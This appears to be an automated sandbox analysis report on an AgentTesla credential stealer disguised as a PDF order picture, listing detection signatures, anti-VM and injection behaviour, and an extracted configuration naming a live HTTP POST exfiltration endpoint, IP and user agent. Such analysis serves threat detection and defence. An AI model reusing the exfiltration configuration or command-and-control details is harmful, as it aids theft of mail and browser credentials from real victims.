Loading ...

Play interactive tourEdit tour

Windows Analysis Report #U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe

Overview

General Information

Sample Name:#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe
Analysis ID:528513
MD5:7fb080a6aa45b1ac87c003e3f84a2983
SHA1:fa4a0744b0b1282e3f3c167773abcd50e806c133
SHA256:a1e613cf9bd9b9afbd51f0c2173cb71ddfdfecdc480b4dc8fc7571a41c90100d
Tags:AgentTeslaexe
Infos:

Most interesting Screenshot:

Detection

AgentTesla
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Yara detected AgentTesla
Yara detected AntiVM3
Multi AV Scanner detection for domain / URL
Tries to steal Mail credentials (via file / registry access)
Initial sample is a PE file and has a suspicious name
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
.NET source code contains potential unpacker
.NET source code contains very large array initializations
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Tries to harvest and steal browser information (history, passwords, etc)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Yara detected Credential Stealer
JA3 SSL client fingerprint seen in connection with other malware
IP address seen in connection with other malware
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Sample file is different than original file name gathered from version info
Uses a known web browser user agent for HTTP communication
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

  • System is w10x64
  • cleanup

Malware Configuration

Threatname: Agenttesla

{"Exfil Mode": "Http", "HTTP method": "Post", "Post URL": "https://www.mgbless.in/buzo/inc/a9e2f06d4bab2c.php", "User Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0"}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000005.00000000.658655936.0000000000402000.00000040.00000001.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
    00000005.00000000.658655936.0000000000402000.00000040.00000001.sdmpJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
      00000005.00000002.915300159.0000000000402000.00000040.00000001.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
        00000005.00000002.915300159.0000000000402000.00000040.00000001.sdmpJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
          00000005.00000002.916801544.0000000002E62000.00000004.00000001.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
            Click to see the 16 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            5.0.#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe.400000.8.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
              5.0.#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe.400000.8.unpackJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
                0.2.#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe.4294230.4.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
                  0.2.#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe.4294230.4.unpackJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
                    5.0.#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe.400000.4.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
                      Click to see the 16 entries

                      Sigma Overview

                      No Sigma rule has matched

                      Jbx Signature Overview

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection:

                      barindex
                      Found malware configurationShow sources
                      Source: 5.0.#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe.400000.10.unpackMalware Configuration Extractor: Agenttesla {"Exfil Mode": "Http", "HTTP method": "Post", "Post URL": "https://www.mgbless.in/buzo/inc/a9e2f06d4bab2c.php", "User Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0"}
                      Multi AV Scanner detection for domain / URLShow sources
                      Source: mgbless.inVirustotal: Detection: 5%Perma Link
                      Source: www.mgbless.inVirustotal: Detection: 7%Perma Link
                      Source: http://www.mgbless.inVirustotal: Detection: 7%Perma Link
                      Source: https://www.mgbless.in/buzo/inc/a9e2f06d4bab2c.phpVirustotal: Detection: 8%Perma Link
                      Source: 5.0.#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe.400000.10.unpackAvira: Label: TR/Spy.Gen8
                      Source: 5.0.#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe.400000.4.unpackAvira: Label: TR/Spy.Gen8
                      Source: 5.0.#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe.400000.8.unpackAvira: Label: TR/Spy.Gen8
                      Source: 5.0.#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe.400000.12.unpackAvira: Label: TR/Spy.Gen8
                      Source: 5.2.#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe.400000.0.unpackAvira: Label: TR/Spy.Gen8
                      Source: 5.0.#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe.400000.6.unpackAvira: Label: TR/Spy.Gen8
                      Source: #U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
                      Source: unknownHTTPS traffic detected: 104.223.93.105:443 -> 192.168.2.4:49779 version: TLS 1.2
                      Source: #U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                      Source: Joe Sandbox ViewASN Name: ASN-QUADRANET-GLOBALUS ASN-QUADRANET-GLOBALUS
                      Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                      Source: Joe Sandbox ViewIP Address: 104.223.93.105 104.223.93.105
                      Source: Joe Sandbox ViewIP Address: 104.223.93.105 104.223.93.105
                      Source: global trafficHTTP traffic detected: POST /buzo/inc/a9e2f06d4bab2c.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: www.mgbless.inContent-Length: 366Expect: 100-continueConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: POST /buzo/inc/a9e2f06d4bab2c.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: www.mgbless.inContent-Length: 362Expect: 100-continue
                      Source: global trafficHTTP traffic detected: POST /buzo/inc/a9e2f06d4bab2c.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: www.mgbless.inContent-Length: 376Expect: 100-continueConnection: Keep-Alive
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49843
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49779 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49843 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49846 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49846
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49779
                      Source: #U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe, 00000005.00000002.916525132.0000000002D11000.00000004.00000001.sdmpString found in binary or memory: http://127.0.0.1:HTTP/1.1
                      Source: #U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe, 00000005.00000002.916525132.0000000002D11000.00000004.00000001.sdmpString found in binary or memory: http://DynDns.comDynDNS
                      Source: #U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe, 00000005.00000002.916525132.0000000002D11000.00000004.00000001.sdmpString found in binary or memory: http://OcJtmX.com
                      Source: #U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe, 00000005.00000002.917580598.00000000064F8000.00000004.00000001.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
                      Source: #U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe, 00000005.00000002.916874458.0000000002EA6000.00000004.00000001.sdmp, #U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe, 00000005.00000002.916631283.0000000002DDA000.00000004.00000001.sdmp, #U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe, 00000005.00000002.916730583.0000000002E06000.00000004.00000001.sdmpString found in binary or memory: http://mgbless.in
                      Source: #U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe, 00000000.00000002.661006568.0000000003161000.00000004.00000001.sdmp, #U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe, 00000005.00000002.916605594.0000000002DBC000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                      Source: #U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe, 00000005.00000002.916874458.0000000002EA6000.00000004.00000001.sdmp, #U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe, 00000005.00000002.916631283.0000000002DDA000.00000004.00000001.sdmp, #U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe, 00000005.00000002.916730583.0000000002E06000.00000004.00000001.sdmpString found in binary or memory: http://www.mgbless.in
                      Source: #U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe, 00000005.00000002.916704934.0000000002DFB000.00000004.00000001.sdmpString found in binary or memory: https://api.ipify.org%
                      Source: #U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe, 00000005.00000002.916525132.0000000002D11000.00000004.00000001.sdmpString found in binary or memory: https://api.ipify.org%GETMozilla/5.0
                      Source: #U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe, 00000005.00000002.916605594.0000000002DBC000.00000004.00000001.sdmp, #U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe, 00000005.00000002.916874458.0000000002EA6000.00000004.00000001.sdmpString found in binary or memory: https://www.mgbless.in
                      Source: #U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe, 00000005.00000002.916605594.0000000002DBC000.00000004.00000001.sdmpString found in binary or memory: https://www.mgbless.in/buzo/inc/a9e2f06d4bab2c.php
                      Source: #U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe, 00000005.00000002.916525132.0000000002D11000.00000004.00000001.sdmpString found in binary or memory: https://www.mgbless.in/buzo/inc/a9e2f06d4bab2c.php127.0.0.1POST
                      Source: #U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe, 00000005.00000002.916605594.0000000002DBC000.00000004.00000001.sdmpString found in binary or memory: https://www.mgbless.in4Xl
                      Source: #U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe, 00000005.00000002.916874458.0000000002EA6000.00000004.00000001.sdmpString found in binary or memory: https://www.mgbless.in4XlLm
                      Source: #U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe, 00000005.00000002.916730583.0000000002E06000.00000004.00000001.sdmpString found in binary or memory: https://www.mgbless.inD8Xl47
                      Source: #U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe, 00000000.00000002.661498626.000000000416D000.00000004.00000001.sdmp, #U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe, 00000005.00000000.658655936.0000000000402000.00000040.00000001.sdmpString found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip
                      Source: #U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe, 00000005.00000002.916525132.0000000002D11000.00000004.00000001.sdmpString found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha
                      Source: unknownHTTP traffic detected: POST /buzo/inc/a9e2f06d4bab2c.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: www.mgbless.inContent-Length: 366Expect: 100-continueConnection: Keep-Alive
                      Source: unknownDNS traffic detected: queries for: www.mgbless.in
                      Source: unknownHTTPS traffic detected: 104.223.93.105:443 -> 192.168.2.4:49779 version: TLS 1.2

                      System Summary:

                      barindex
                      Initial sample is a PE file and has a suspicious nameShow sources
                      Source: initial sampleStatic PE information: Filename: #U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe
                      Source: initial sampleStatic PE information: Filename: #U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe
                      .NET source code contains very large array initializationsShow sources
                      Source: 5.0.#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe.400000.10.unpack, u003cPrivateImplementationDetailsu003eu007b9AE5D3B4u002d2635u002d4821u002d844Au002d98E2A33766C9u007d/CD5F680Cu002dBDE0u002d494Bu002dB19Fu002dD0BFC7469809.csLarge array initialization: .cctor: array initializer size 11847
                      Source: 5.0.#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe.400000.4.unpack, u003cPrivateImplementationDetailsu003eu007b9AE5D3B4u002d2635u002d4821u002d844Au002d98E2A33766C9u007d/CD5F680Cu002dBDE0u002d494Bu002dB19Fu002dD0BFC7469809.csLarge array initialization: .cctor: array initializer size 11847
                      Source: 5.0.#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe.400000.8.unpack, u003cPrivateImplementationDetailsu003eu007b9AE5D3B4u002d2635u002d4821u002d844Au002d98E2A33766C9u007d/CD5F680Cu002dBDE0u002d494Bu002dB19Fu002dD0BFC7469809.csLarge array initialization: .cctor: array initializer size 11847
                      Source: 5.0.#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe.400000.12.unpack, u003cPrivateImplementationDetailsu003eu007b9AE5D3B4u002d2635u002d4821u002d844Au002d98E2A33766C9u007d/CD5F680Cu002dBDE0u002d494Bu002dB19Fu002dD0BFC7469809.csLarge array initialization: .cctor: array initializer size 11847
                      Source: #U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeCode function: 0_2_016982500_2_01698250
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeCode function: 0_2_0169D2E80_2_0169D2E8
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeCode function: 5_2_00E13C205_2_00E13C20
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeCode function: 5_2_00E19D185_2_00E19D18
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeCode function: 5_2_00E112705_2_00E11270
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeCode function: 5_2_00E133B85_2_00E133B8
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeCode function: 5_2_00E1AB945_2_00E1AB94
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeCode function: 5_2_00E4B8385_2_00E4B838
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeCode function: 5_2_00E467C05_2_00E467C0
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeCode function: 5_2_011646A05_2_011646A0
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeCode function: 5_2_0116465F5_2_0116465F
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeCode function: 5_2_0116467F5_2_0116467F
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeCode function: 5_2_0116DA005_2_0116DA00
                      Source: #U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeBinary or memory string: OriginalFilename vs #U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe
                      Source: #U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe, 00000000.00000002.663674311.0000000006710000.00000004.00020000.sdmpBinary or memory string: OriginalFilenameUI.dll@ vs #U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe
                      Source: #U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe, 00000000.00000002.661006568.0000000003161000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameInnerException.dll" vs #U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe
                      Source: #U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe, 00000000.00000002.661006568.0000000003161000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameGUdFRhHFLvYFZdmxEdTnFNkQg.exe4 vs #U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe
                      Source: #U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe, 00000000.00000002.661498626.000000000416D000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameGUdFRhHFLvYFZdmxEdTnFNkQg.exe4 vs #U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe
                      Source: #U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe, 00000000.00000002.661498626.000000000416D000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameUI.dll@ vs #U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe
                      Source: #U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeBinary or memory string: OriginalFilename vs #U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe
                      Source: #U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeBinary or memory string: OriginalFilename vs #U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe
                      Source: #U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe, 00000005.00000002.915352748.0000000000438000.00000040.00000001.sdmpBinary or memory string: OriginalFilenameGUdFRhHFLvYFZdmxEdTnFNkQg.exe4 vs #U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe
                      Source: #U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe, 00000005.00000002.915560272.0000000000CF8000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameUNKNOWN_FILET vs #U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe
                      Source: #U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeBinary or memory string: OriginalFilenameDebugg.exe. vs #U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe
                      Source: #U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeFile read: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe:Zone.IdentifierJump to behavior
                      Source: #U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                      Source: unknownProcess created: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe "C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe"
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeProcess created: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeProcess created: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeProcess created: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeJump to behavior
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeProcess created: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeJump to behavior
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{172BDDF8-CEEA-11D1-8B05-00600806D9B6}\InProcServer32Jump to behavior
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe.logJump to behavior
                      Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@5/1@6/2
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeMutant created: \Sessions\1\BaseNamedObjects\Global\.net data provider for sqlserver
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeMutant created: \Sessions\1\BaseNamedObjects\zvjPHYm
                      Source: #U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeString found in binary or memory: /Debugg;component/views/addbook.xaml
                      Source: #U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeString found in binary or memory: views/addcustomer.baml
                      Source: #U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeString found in binary or memory: views/addbook.baml
                      Source: #U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeString found in binary or memory: /Debugg;component/views/addcustomer.xaml
                      Source: #U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeString found in binary or memory: /Debugg;component/views/addbook.xaml
                      Source: #U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeString found in binary or memory: views/addbook.baml
                      Source: #U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeString found in binary or memory: views/addcustomer.baml
                      Source: #U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeString found in binary or memory: /Debugg;component/views/addcustomer.xaml
                      Source: #U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeString found in binary or memory: /Debugg;component/views/addbook.xaml
                      Source: #U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeString found in binary or memory: views/addbook.baml
                      Source: #U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeString found in binary or memory: views/addcustomer.baml
                      Source: #U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeString found in binary or memory: /Debugg;component/views/addcustomer.xaml
                      Source: #U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeString found in binary or memory: I/Debugg;component/views/addbook.xaml_/Debugg;component/views/borrowfrombookview.xamlU/Debugg;component/views/borrowingview.xamlO/Debugg;component/views/changebook.xamlW/Debugg;component/views/changecustomer.xamlS/Debugg;component/views/customerview.xamlW/Debugg;component/views/deletecustomer.xamlM/Debugg;component/views/errorview.xamlQ/Debugg;component/views/smallextras.xamlQ/Debugg;component/views/addcustomer.xaml
                      Source: #U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeString found in binary or memory: *images/booksimage.jpg$views/addbook.baml1J,views/addcustomer.baml
                      Source: 5.0.#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe.400000.10.unpack, A/b2.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                      Source: 5.0.#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe.400000.10.unpack, A/b2.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                      Source: 5.0.#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe.400000.4.unpack, A/b2.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                      Source: 5.0.#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe.400000.4.unpack, A/b2.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                      Source: 5.0.#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe.400000.8.unpack, A/b2.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                      Source: 5.0.#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe.400000.8.unpack, A/b2.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                      Source: #U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                      Source: #U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

                      Data Obfuscation:

                      barindex
                      .NET source code contains potential unpackerShow sources
                      Source: #U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe, Biblan/Views/MainWindow.cs.Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                      Source: 0.0.#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe.df0000.0.unpack, Biblan/Views/MainWindow.cs.Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                      Source: 0.2.#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe.df0000.0.unpack, Biblan/Views/MainWindow.cs.Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                      Source: 3.0.#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe.3e0000.1.unpack, Biblan/Views/MainWindow.cs.Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                      Source: 3.0.#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe.3e0000.0.unpack, Biblan/Views/MainWindow.cs.Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                      Source: 3.2.#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe.3e0000.0.unpack, Biblan/Views/MainWindow.cs.Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                      Source: 3.0.#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe.3e0000.3.unpack, Biblan/Views/MainWindow.cs.Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                      Source: 3.0.#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe.3e0000.2.unpack, Biblan/Views/MainWindow.cs.Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
